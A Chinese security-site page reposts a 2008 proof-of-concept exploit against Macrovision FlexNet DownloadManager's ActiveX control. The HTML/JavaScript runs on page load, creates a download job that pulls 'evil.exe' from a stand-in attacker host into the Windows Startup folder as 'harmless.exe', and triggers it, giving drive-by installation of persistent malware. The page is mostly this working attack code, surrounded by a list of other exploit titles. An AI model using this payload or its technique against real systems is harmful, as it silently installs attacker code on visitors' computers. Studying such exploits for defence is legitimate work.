首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Macrovision FlexNet DownloadManager Insecure Methods Exploit
来源:www.vfocus.net 作者:e.b. 发布时间:2008-01-15  
<!--
Macrovision FlexNet DownloadManager Insecure Methods Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
-->
<html>
<head>
  <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
    
var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");

mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
mJob.SetPriority(0);
mJob.SetNotifyFlags(2);
mJob.ScheduleInterval = 2;

obj.RunScheduledJobs();
               
         
    }
  
   </script>
  </head>
<body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
     Unable to create object
    </object>
</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xforum 1.4 (topic) Remote SQL
·X7 Chat <= 2.0.5 (day) Remote
·Cisco VPN Client IPSec Driver
·Quicktime Player <= 7.3.1.70 H
·PixelPost 1.7 Remote Blind SQL
·Agares PhpAutoVideo 2.21 (arti
·PixelPost 1.7 Remote Blind SQL
·NUVICO DVR NVDV4 / PdvrAtl Mod
·MyBulletinBoard (MyBB) <= 1.2.
·photokron <= 1.7 (update scrip
·0DayDB 2.3 (delete id) Remote
·BitTorrent and UTorrent Peers
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved